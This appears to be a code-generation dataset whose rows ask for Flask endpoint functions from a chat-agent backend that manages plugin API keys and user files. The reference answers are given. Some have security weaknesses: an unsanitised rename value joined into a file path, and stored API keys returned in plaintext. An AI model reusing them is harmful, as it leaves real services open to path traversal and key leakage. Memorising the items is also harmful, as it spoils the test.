id (int64, 0–190k) | prompt (string, lengths 21–13.4M) | docstring (string, lengths 1–12k, may be empty)
---|---|---|
188,431 | from flask import request, jsonify, Response
from backend.api.chat_plugin import plugins
from backend.main import app, api_key_pool
from backend.schemas import DEFAULT_USER_ID
global plugins
plugins = []
# Load icon image
# If image is base64 encoded
plugins.append(
{
"id": plugin_type,
"name": plugin_type,
"name_for_human": plugin_info["meta_info"]["manifest"]["name_for_human"],
"description": plugin_info["description"],
"icon": encoded_image,
"require_api_key": plugin_info["need_auth"],
}
)
api_key_pool: UserMemoryManager = UserMemoryManager(name="api_key_pool", backend=API_KEY_MEMORY_MANAGER_BACKEND)
DEFAULT_USER_ID = "DefaultUser"
The provided code snippet includes necessary dependencies for implementing the `get_tool_list` function. Write a Python function `def get_tool_list() -> Response` to solve the following problem:
parameters: { user_id: id of the user } return value: [{ id: id of a plugin, name: name of a plugin, description: description of the plugin, icon: icon of the plugin, require_api_key: whether the plugin requires api_key, api_key: the api key of the plugin, None if no api key }]
Here is the function:
def get_tool_list() -> Response:
"""parameters:
{
user_id: id of the user
}
return value:
[{
id: id of a plugin,
name: name of a plugin,
description: description of the plugin,
icon: icon of the plugin,
require_api_key: whether the plugin requires api_key,
api_key: the api key of the plugin, None if no api key
}]
"""
user_id = DEFAULT_USER_ID
api_key_info = api_key_pool.get_pool_info_with_id(user_id, [])
tool_list = []
for plugin in plugins:
plugin_info = {
"id": plugin["id"],
"name": plugin["name"],
"name_for_human": plugin["name_for_human"],
"description": plugin["description"],
"icon": plugin["icon"],
"require_api_key": plugin["require_api_key"],
}
search_plugin = [i for i in api_key_info if i["tool_id"] == plugin["id"]]
if len(search_plugin) > 0:
plugin_info["api_key"] = search_plugin[0]["api_key"]
else:
plugin_info["api_key"] = None
tool_list.append(plugin_info)
return jsonify(tool_list) | parameters: { user_id: id of the user } return value: [{ id: id of a plugin, name: name of a plugin, description: description of the plugin, icon: icon of the plugin, require_api_key: whether the plugin requires api_key, api_key: the api key of the plugin, None if no api key }] |
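A minimal usage sketch for this endpoint, assuming the function is registered on the Flask app as a POST route (the route path "/api/tool_list" and the registration call are assumptions, not shown in the snippet). Note that the body above ignores any posted user_id and always falls back to DEFAULT_USER_ID:
app.add_url_rule("/api/tool_list", view_func=get_tool_list, methods=["POST"])  # hypothetical route
with app.test_client() as client:
    resp = client.post("/api/tool_list", json={"user_id": "DefaultUser"})
    tools = resp.get_json()
    # Each entry has the shape:
    # {"id": ..., "name": ..., "name_for_human": ..., "description": ...,
    #  "icon": ..., "require_api_key": ..., "api_key": <key or None>}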
188,432 | from flask import request, jsonify, Response
from backend.api.chat_plugin import plugins
from backend.main import app, api_key_pool
from backend.schemas import DEFAULT_USER_ID
api_key_pool: UserMemoryManager = UserMemoryManager(name="api_key_pool", backend=API_KEY_MEMORY_MANAGER_BACKEND)
DEFAULT_USER_ID = "DefaultUser"
The provided code snippet includes necessary dependencies for implementing the `post_tool_api_key` function. Write a Python function `def post_tool_api_key() -> Response` to solve the following problem:
parameters: { user_id: id of the user, tool_id: id of the tool, tool_name: name of the tool, api_key: api_key of the tool }
Here is the function:
def post_tool_api_key() -> Response:
"""parameters:
{
user_id: id of the user,
tool_id: id of the tool,
tool_name: name of the tool,
api_key: api_key of the tool
}
"""
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
tool_id = request_json["tool_id"]
tool_name = request_json["tool_name"]
api_key = request_json["api_key"]
api_key_info = api_key_pool.get_pool_info_with_id(user_id, [])
flag = False
for i in api_key_info:
if i["tool_id"] == tool_id:
flag = True
i["api_key"] = api_key
if not flag:
api_key_info.append({"tool_id": tool_id, "tool_name": tool_name, "api_key": api_key})
api_key_pool.set_pool_info_with_id(user_id, api_key_info)
return Response("Success", status=200) | parameters: { user_id: id of the user, tool_id: id of the tool, tool_name: name of the tool, api_key: api_key of the tool } |
188,433 | import os
from backend.app import app
from real_agents.adapters.models import ChatOpenAI, ChatAnthropic, AzureChatOpenAI
from real_agents.adapters.llm import BaseLanguageModel
The provided code snippet includes necessary dependencies for implementing the `get_llm_list` function. Write a Python function `def get_llm_list()` to solve the following problem:
Gets the whole llm list.
Here is the function:
def get_llm_list():
"""Gets the whole llm list."""
return [
{"id": llm, "name": llm} for llm in [
"gpt-3.5-turbo-16k",
"gpt-4",
"claude-v1",
"claude-2",
"lemur-chat"
]
] | Gets the whole llm list. |
188,434 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
def secure_filename(filename: str) -> str:
keep_characters = ('.', '_')
filename = "".join(
c for c in filename if c.isalnum() or c in keep_characters).rstrip()
return filename
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
def get_user_and_chat_id_from_request(request: Request) -> Tuple[str, str]:
user_id = request.form.get("user_id", DEFAULT_USER_ID)
chat_id = request.form.get("chat_id")
return user_id, chat_id
def allowed_file(filename: Union[str, Path]) -> bool:
if isinstance(filename, str):
filename = Path(filename)
suffix = filename.suffix[1:]
if suffix in ALLOW_EXTENSIONS:
return True
else:
return False
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
INTERNAL = 500
The provided code snippet includes necessary dependencies for implementing the `create_upload_file` function. Write a Python function `def create_upload_file() -> dict | Response` to solve the following problem:
Uploads a new file.
Here is the function:
def create_upload_file() -> dict | Response:
"""Uploads a new file."""
try:
if "file" not in request.files:
return {"error": "No file part in the request"}
file = request.files["file"]
(user_id, chat_id) = get_user_and_chat_id_from_request(request)
folder = create_personal_folder(user_id)
# Check if the file is allowed
if not allowed_file(str(file.filename)):
return {"error": "File type not allowed"}
# Save and read the file
file.filename = secure_filename(str(file.filename))
file_path = os.path.join(folder, file.filename)
file.save(file_path)
response = {"success": file.filename}
logger.bind(user_id=user_id, chat_id=chat_id, api="/upload",
msg_head="Upload file success").debug(file_path)
return jsonify(response)
except Exception as e:
logger.bind(user_id=user_id, chat_id=chat_id, api="/upload",
msg_head="Upload file error").error(str(e))
return Response(response=None, status=f"{INTERNAL} Upload File Error: {str(e)}") | Uploads a new file. |
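A minimal multipart upload sketch, assuming this handler backs the "/upload" route referenced in the logger binding (the registration itself is an assumption):
import io
app.add_url_rule("/upload", view_func=create_upload_file, methods=["POST"])  # hypothetical route
with app.test_client() as client:
    resp = client.post(
        "/upload",
        data={
            "user_id": "DefaultUser",
            "chat_id": "chat-001",                          # hypothetical chat id
            "file": (io.BytesIO(b"a,b\n1,2\n"), "demo.csv"),
        },
        content_type="multipart/form-data",
    )
    # On success the handler returns {"success": "<sanitized filename>"};
    # disallowed extensions yield {"error": "File type not allowed"}.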
188,435 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
def _generate_human_side_data_from_file(filename: str, data_model: Any) -> Dict:
if is_table_file(filename):
# Determine the format of the human side(frontend) table
human_side_data = data_model.get_human_side_data(mode="FULL")
if TABLE_HUMAN_SIDE_FORMAT == "markdown":
human_side_data = human_side_data.to_markdown(index=False)
human_side_data_type = "plain"
elif TABLE_HUMAN_SIDE_FORMAT == "material-react-table":
columns = list(map(lambda item: {"accessorKey": item, "header": item},
human_side_data.columns.tolist()))
data = human_side_data.fillna("").to_dict(orient="records")
human_side_data = json.dumps({"columns": columns, "data": data})
human_side_data_type = "table"
data = {"success": filename, "content": human_side_data,
"type": human_side_data_type}
elif is_sqlite_file(filename):
data = {"success": filename, "content": filename, "type": "table"}
elif is_image_file(filename):
# Determine the format of human side(frontend) image
human_side_data = data_model.get_human_side_data()
data = {"success": filename, "content": human_side_data, "type": "image"}
else:
return {"error": "Document file type not supported"}
return data
def _get_file_path_from_node(folder: str, file_node: dict) -> Any:
path_tree_list: list = []
id_to_path_dict = {0: folder}
_path_tree_for_react_dnd_treeview(path_tree_list, id_to_path_dict, folder, 0)
path = id_to_path_dict[file_node["id"]]
return path
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
message_pool: MessageMemoryManager = MessageMemoryManager(name="message_pool", backend=MESSAGE_MEMORY_MANAGER_BACKEND)
grounding_source_pool: ChatMemoryManager = ChatMemoryManager()
message_id_register = VariableRegister(name="message_id_register", backend=VARIABLE_REGISTER_BACKEND)
def get_user_and_chat_id_from_request_json(request_json: Dict) -> Tuple[str, str]:
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
return user_id, chat_id
def load_grounding_source(file_path: str) -> Any:
# TODO: Maybe convert to DataModel here
suffix = Path(file_path).suffix
if Path(file_path).is_dir():
# Assume it is a collection of csv files, usually downloaded from kaggle.
grounding_source = {}
for file in Path(file_path).iterdir():
if file.suffix == ".csv":
grounding_source[file.as_posix()] = pd.read_csv(file, index_col=False)
else:
raise ValueError("Only csv files are allowed in the directory")
elif suffix == ".csv":
grounding_source = pd.read_csv(file_path, index_col=False)
elif suffix == ".tsv" or suffix == ".txt":
grounding_source = pd.read_csv(file_path, sep="\t")
elif suffix == ".xlsx" or suffix == ".xls":
grounding_source = pd.read_excel(file_path)
elif suffix == ".db" or suffix == ".sqlite":
engine = create_engine(f"sqlite:///{file_path}")
grounding_source = SQLDatabase(engine)
return grounding_source
elif suffix == ".png" or suffix == ".jpg" or suffix == ".jpeg":
img = Image.open(file_path)
with open(file_path, "rb") as image2string:
converted_string = "data:image/png;base64," + base64.b64encode(image2string.read()).decode("utf-8")
grounding_source = {
"base64_string": converted_string,
"format": img.format,
"size": img.size,
"mode": img.mode,
}
else:
raise ValueError("File type not allowed to be set as grounding source")
return grounding_source
def get_data_model_cls(file_path: str) -> DataModel:
suffix = Path(file_path).suffix
if Path(file_path).is_dir():
data_model_cls = KaggleDataModel
elif suffix == ".csv":
data_model_cls = TableDataModel
elif suffix == ".tsv" or suffix == ".txt":
raise NotImplementedError("Not implemented yet")
elif suffix == ".xlsx" or suffix == ".xls":
data_model_cls = TableDataModel
elif suffix == ".sqlite" or suffix == ".db":
data_model_cls = DatabaseDataModel
elif suffix == ".jpeg" or suffix == ".png" or suffix == ".jpg":
data_model_cls = ImageDataModel
else:
raise ValueError("File type not allowed to be set as grounding source")
return data_model_cls
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
def get_user_conversation_storage():
"""Connects to mongodb."""
if "user_conversation_storage" not in g:
g.user_conversation_storage = pymongo.MongoClient("mongodb://{0}:27017/".format(os.getenv("MONGO_SERVER")))
return g.user_conversation_storage["xlang"]
INTERNAL = 500
The provided code snippet includes necessary dependencies for implementing the `apply_to_conversation` function. Write a Python function `def apply_to_conversation() -> Response` to solve the following problem:
Applies data to the conversation.
Here is the function:
def apply_to_conversation() -> Response:
"""Applies data to the conversation."""
try:
request_json = request.get_json()
(user_id, chat_id) = get_user_and_chat_id_from_request_json(request_json)
file_node = request_json["activated_file"]
parent_message_id = request_json["parent_message_id"]
folder = create_personal_folder(user_id)
# Modify the selected grounding sources
grounding_source_dict = grounding_source_pool.get_pool_info_with_id(user_id,
chat_id,
default_value={})
file_path = _get_file_path_from_node(folder, file_node)
filename = file_node["text"]
filename_no_ext = os.path.splitext(filename)[0]
if file_path not in grounding_source_dict:
data = load_grounding_source(file_path)
data_model = get_data_model_cls(filename).from_raw_data(
raw_data=data,
raw_data_name=filename_no_ext,
raw_data_path=file_path,
)
grounding_source_dict[file_path] = data_model
# Add uploaded file in chat memory
message_list = message_pool.get_pool_info_with_id(user_id, chat_id,
default_value=list())
llm_side_data = data_model.get_llm_side_data()
human_message_content = "[User uploaded a file {}]\n{}".format(filename,
llm_side_data)
human_message_id = message_id_register.add_variable(human_message_content)
message_list.append(
{
"message_id": human_message_id,
"parent_message_id": parent_message_id,
"message_type": "human_message",
"message_content": human_message_content,
}
)
data = _generate_human_side_data_from_file(filename, data_model)
message_pool.set_pool_info_with_id(user_id, chat_id, message_list)
grounding_source_pool.set_pool_info_with_id(user_id, chat_id,
grounding_source_dict)
# Dump to database
db = get_user_conversation_storage()
db_message = {
"conversation_id": chat_id,
"user_id": user_id,
"message_id": human_message_id,
"parent_message_id": parent_message_id,
"version_id": 0,
"role": "user",
"data_for_human": {
"intermediate_steps": [],
"final_answer": [
{
"type": data["type"],
"text": data["content"],
"final": True,
}
],
},
"data_for_llm": message_list[-1]["message_content"],
"raw_data": None,
}
db.message.insert_one(db_message)
response = {
"success": True,
"message_id": human_message_id,
"parent_message_id": parent_message_id,
"message": "Successfully apply {} to conversation {}".format(filename,
chat_id),
"content": {
"intermediate_steps": [],
"final_answer": [
{
"type": data["type"],
"text": data["content"],
"final": True,
}
],
},
}
logger.bind(user_id=user_id, chat_id=chat_id, api="/apply",
msg_head="Apply file success").debug(file_path)
del db_message["data_for_human"]
return jsonify(response)
else:
logger.bind(user_id=user_id, chat_id=chat_id, api="/apply",
msg_head="Apply file failed").debug(file_path)
return jsonify({"success": False,
"message": "You have already import {} to the conversation".format(
filename)})
except Exception as e:
logger.bind(user_id=user_id, chat_id=chat_id, api="/apply",
msg_head="Apply file failed").error(file_path)
import traceback
traceback.print_exc()
return Response(response=None,
status=f"{INTERNAL} Fail to apply file to chat: {str(e)}") | Applies data to the conversation. |
188,436 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
def _path_tree_for_react_dnd_treeview(tree: list, id_to_path_dict: dict, path: str,
parent: int,
highlighted_files: list = []) -> list:
"""
{
"id": 1,
"parent": 0,
"droppable": true,
"text": "Folder 1"
},
{
"id": 2,
"parent": 1,
"text": "File 1-1",
"data": {
"fileType": "csv",
"fileSize": "0.5MB"
}
},
"""
for item in os.listdir(path):
if item.startswith("."):
continue
item_path = os.path.join(path, item)
droppable = os.path.isdir(item_path)
idx = len(tree) + 1
tree.append({
"id": idx,
"parent": parent,
"droppable": droppable,
"text": item,
"highlight": True if item_path in highlighted_files else False})
id_to_path_dict[idx] = item_path
if os.path.isdir(item_path):
_path_tree_for_react_dnd_treeview(tree, id_to_path_dict, item_path, idx)
return []
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
def get_user_and_chat_id_from_request_json(request_json: Dict) -> Tuple[str, str]:
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
return user_id, chat_id
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
INTERNAL = 500
The provided code snippet includes necessary dependencies for implementing the `move_files` function. Write a Python function `def move_files() -> Response` to solve the following problem:
Moves a file from the source path to the target path.
Here is the function:
def move_files() -> Response:
"""Moves file from source path from target source."""
request_json = request.get_json()
(user_id, chat_id) = get_user_and_chat_id_from_request_json(request_json)
root_path = create_personal_folder(user_id)
nodes = request_json["nodes"]
try:
if os.path.exists(root_path) and os.path.isdir(root_path):
current_path_tree_list: list = []
id_to_path_dict = {0: root_path}
_path_tree_for_react_dnd_treeview(current_path_tree_list, id_to_path_dict,
root_path, 0)
for node in nodes:
old_path = id_to_path_dict[node["id"]]
new_path = id_to_path_dict[node["parent"]]
shutil.move(old_path, new_path)
logger.bind(user_id=user_id, chat_id=chat_id, api="/move",
msg_head="Move file success").debug(
f"from {old_path} to {new_path}"
)
return jsonify({"success": True, "message": "File moved successfully"})
except Exception as e:
logger.bind(user_id=user_id, chat_id=chat_id, api="/move",
msg_head="Move file failed").error(str(e))
return jsonify({"success": False, "message": str(e)})
    return Response(response=None, status=f"{INTERNAL} Fail to move file") | Moves a file from the source path to the target path. |
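A sketch of the move payload, assuming node ids come from the same depth-first enumeration used by _path_tree_for_react_dnd_treeview, where id 0 is always the user's root folder (the ids below are hypothetical):
payload = {
    "user_id": "DefaultUser",
    "chat_id": "chat-001",
    "nodes": [
        # Move the entry with tree id 3 into the folder with tree id 1;
        # "parent" must resolve to a directory (or 0 for the root folder).
        {"id": 3, "parent": 1},
    ],
}
# Server-side, each entry is resolved through id_to_path_dict and passed to
# shutil.move(old_path, new_path).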
188,437 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
def _path_tree_for_react_dnd_treeview(tree: list, id_to_path_dict: dict, path: str,
parent: int,
highlighted_files: list = []) -> list:
"""
{
"id": 1,
"parent": 0,
"droppable": true,
"text": "Folder 1"
},
{
"id": 2,
"parent": 1,
"text": "File 1-1",
"data": {
"fileType": "csv",
"fileSize": "0.5MB"
}
},
"""
for item in os.listdir(path):
if item.startswith("."):
continue
item_path = os.path.join(path, item)
droppable = os.path.isdir(item_path)
idx = len(tree) + 1
tree.append({
"id": idx,
"parent": parent,
"droppable": droppable,
"text": item,
"highlight": True if item_path in highlighted_files else False})
id_to_path_dict[idx] = item_path
if os.path.isdir(item_path):
_path_tree_for_react_dnd_treeview(tree, id_to_path_dict, item_path, idx)
return []
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
def get_user_and_chat_id_from_request_json(request_json: Dict) -> Tuple[str, str]:
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
return user_id, chat_id
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
INTERNAL = 500
The provided code snippet includes necessary dependencies for implementing the `delete_files` function. Write a Python function `def delete_files() -> Response` to solve the following problem:
Deletes a file from the filesystem.
Here is the function:
def delete_files() -> Response:
"""Deletes a file from the filesystem."""
request_json = request.get_json()
(user_id, chat_id) = get_user_and_chat_id_from_request_json(request_json)
root_path = create_personal_folder(user_id)
node = request_json["node"]
try:
if os.path.exists(root_path) and os.path.isdir(root_path):
current_path_tree_list: list = []
id_to_path_dict = {0: root_path}
_path_tree_for_react_dnd_treeview(current_path_tree_list, id_to_path_dict,
root_path, 0)
path = id_to_path_dict[node["id"]]
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
logger.bind(user_id=user_id, chat_id=chat_id, api="/delete",
msg_head="Delete file success").debug(path)
return jsonify({"success": True, "message": "File is deleted successfully"})
except Exception as e:
logger.bind(user_id=user_id, chat_id=chat_id, api="/delete",
msg_head="Delete file failed").error(str(e))
return Response(response=None,
status=f"{INTERNAL} Delete file failed: {str(e)}") | Deletes a file from the filesystem. |
188,438 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
def _path_tree_for_react_dnd_treeview(tree: list, id_to_path_dict: dict, path: str,
parent: int,
highlighted_files: list = []) -> list:
"""
{
"id": 1,
"parent": 0,
"droppable": true,
"text": "Folder 1"
},
{
"id": 2,
"parent": 1,
"text": "File 1-1",
"data": {
"fileType": "csv",
"fileSize": "0.5MB"
}
},
"""
for item in os.listdir(path):
if item.startswith("."):
continue
item_path = os.path.join(path, item)
droppable = os.path.isdir(item_path)
idx = len(tree) + 1
tree.append({
"id": idx,
"parent": parent,
"droppable": droppable,
"text": item,
"highlight": True if item_path in highlighted_files else False})
id_to_path_dict[idx] = item_path
if os.path.isdir(item_path):
_path_tree_for_react_dnd_treeview(tree, id_to_path_dict, item_path, idx)
return []
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
INTERNAL = 500
DEFAULT_USER_ID = "DefaultUser"
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
The provided code snippet includes necessary dependencies for implementing the `download_files` function. Write a Python function `def download_files() -> Response` to solve the following problem:
Downloads a file to the local machine.
Here is the function:
def download_files() -> Response:
"""Downloads a file to local."""
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
root_path = create_personal_folder(user_id)
node = request_json["node"]
try:
if os.path.exists(root_path) and os.path.isdir(root_path):
current_path_tree_list: list = []
id_to_path_dict = {0: root_path}
_path_tree_for_react_dnd_treeview(current_path_tree_list, id_to_path_dict,
root_path, 0)
path = id_to_path_dict[node["id"]]
if os.path.exists(path):
logger.bind(user_id=user_id, api="/download",
msg_head="download file success").debug(path)
return send_file(path, as_attachment=True)
logger.bind(user_id=user_id, api="/download",
msg_head="download file failed").debug(path)
return Response(response=None,
status=f"{INTERNAL} Download file failed: file not correctlt sent")
except Exception as e:
print(str(e))
import traceback
traceback.print_exc()
logger.bind(user_id=user_id, api="/download",
msg_head="download file failed").error(str(e))
return Response(response=None,
status=f"{INTERNAL} Download file failed: {str(e)}") | Downloads a file to local. |
188,439 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
def _generate_directory_name(name: str, x:int=0) -> Any:
dir_name = (name + ("_" + str(x) if x != 0 else "")).strip()
if not os.path.exists(dir_name):
return dir_name
else:
return _generate_directory_name(name, x + 1)
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
def get_user_and_chat_id_from_request_json(request_json: Dict) -> Tuple[str, str]:
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
return user_id, chat_id
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
INTERNAL = 500
The provided code snippet includes necessary dependencies for implementing the `create_folders` function. Write a Python function `def create_folders() -> Response` to solve the following problem:
Creates a folder in the filesystem.
Here is the function:
def create_folders() -> Response:
"""Creates a folder in the filesystem."""
request_json = request.get_json()
(user_id, chat_id) = get_user_and_chat_id_from_request_json(request_json)
root_path = create_personal_folder(user_id)
if os.path.exists(root_path) and os.path.isdir(root_path):
try:
new_path = _generate_directory_name(os.path.join(root_path, "Folder"))
os.makedirs(new_path, exist_ok=False)
logger.bind(
user_id=user_id, chat_id=chat_id, api="/create_folder",
msg_head="Create folder success"
).debug(new_path)
return jsonify({"success": True, "message": "Folder created successfully"})
except Exception as e:
logger.bind(user_id=user_id, chat_id=chat_id, api="/create_folder",
msg_head="Create folder failed").error(
str(e)
)
return jsonify({"success": False, "message": str(e)})
else:
logger.bind(user_id=user_id, chat_id=chat_id, api="/create_folder",
msg_head="Create folder failed").error(
"Root path does not exist."
)
return Response(response=None, status=f"{INTERNAL} Root path does not exist") | Creates a folder in the filesystem. |
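A small sketch of how _generate_directory_name avoids name collisions: it appends an incrementing suffix until the candidate path does not exist (the layout below is hypothetical):
# Given an existing layout
#   <root>/Folder      (exists)
#   <root>/Folder_1    (exists)
# the recursion tries "Folder", then "Folder_1", then "Folder_2", returning the
# first free candidate:
new_path = _generate_directory_name(os.path.join(root_path, "Folder"))
os.makedirs(new_path, exist_ok=False)   # creates <root>/Folder_2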
188,440 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
from backend.main import (
grounding_source_pool,
logger,
message_id_register,
message_pool,
)
from backend.schemas import DEFAULT_USER_ID
from backend.utils.utils import create_personal_folder
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import (
allowed_file,
get_data_model_cls,
get_user_and_chat_id_from_request,
get_user_and_chat_id_from_request_json,
is_sqlite_file,
is_table_file,
is_image_file,
load_grounding_source,
)
from backend.schemas import INTERNAL, UNFOUND
def _path_tree_for_react_dnd_treeview(tree: list, id_to_path_dict: dict, path: str,
parent: int,
highlighted_files: list = []) -> list:
"""
{
"id": 1,
"parent": 0,
"droppable": true,
"text": "Folder 1"
},
{
"id": 2,
"parent": 1,
"text": "File 1-1",
"data": {
"fileType": "csv",
"fileSize": "0.5MB"
}
},
"""
for item in os.listdir(path):
if item.startswith("."):
continue
item_path = os.path.join(path, item)
droppable = os.path.isdir(item_path)
idx = len(tree) + 1
tree.append({
"id": idx,
"parent": parent,
"droppable": droppable,
"text": item,
"highlight": True if item_path in highlighted_files else False})
id_to_path_dict[idx] = item_path
if os.path.isdir(item_path):
_path_tree_for_react_dnd_treeview(tree, id_to_path_dict, item_path, idx)
return []
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
def get_user_and_chat_id_from_request_json(request_json: Dict) -> Tuple[str, str]:
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
return user_id, chat_id
def create_personal_folder(user_id: str) -> str:
# mkdir user folder
from backend.main import app
user_folder = os.path.join(app.config["UPLOAD_FOLDER"], user_id)
os.makedirs(user_folder, exist_ok=True)
# mkdir chat folder under user folder
return user_folder
INTERNAL = 500
The provided code snippet includes necessary dependencies for implementing the `rename_folder` function. Write a Python function `def rename_folder() -> Response` to solve the following problem:
Renames a folder in the filesystem.
Here is the function:
def rename_folder() -> Response:
"""Renames a folder in the filesystem."""
request_json = request.get_json()
(user_id, chat_id) = get_user_and_chat_id_from_request_json(request_json)
root_path = create_personal_folder(user_id)
node = request_json["node"]
rename_value = request_json["rename_value"]
if os.path.exists(root_path) and os.path.isdir(root_path):
try:
current_path_tree_list: list = []
id_to_path_dict = {0: root_path}
_path_tree_for_react_dnd_treeview(current_path_tree_list, id_to_path_dict,
root_path, 0)
path = id_to_path_dict[node["id"]]
new_path = os.path.join(os.path.dirname(path), rename_value)
shutil.move(path, new_path)
logger.bind(user_id=user_id, chat_id=chat_id, api="/update",
msg_head="Rename folder success").debug(
f"{path} to {new_path}"
)
return jsonify({"success": True, "message": "Folder created successfully"})
except Exception as e:
logger.bind(user_id=user_id, chat_id=chat_id, api="/update",
msg_head="Rename folder failed").error(str(e))
return jsonify({"success": False, "message": str(e)})
else:
logger.bind(user_id=user_id, chat_id=chat_id, api="/update",
msg_head="Rename folder failed").error(
"Root path does not exist."
)
return Response(response=None, status=f"{INTERNAL} Root path does not exist") | Renames a folder in the filesystem. |
188,441 | import json
import os
import shutil
from typing import Dict, Any
from flask import Response, jsonify, request, send_file
from backend.app import app
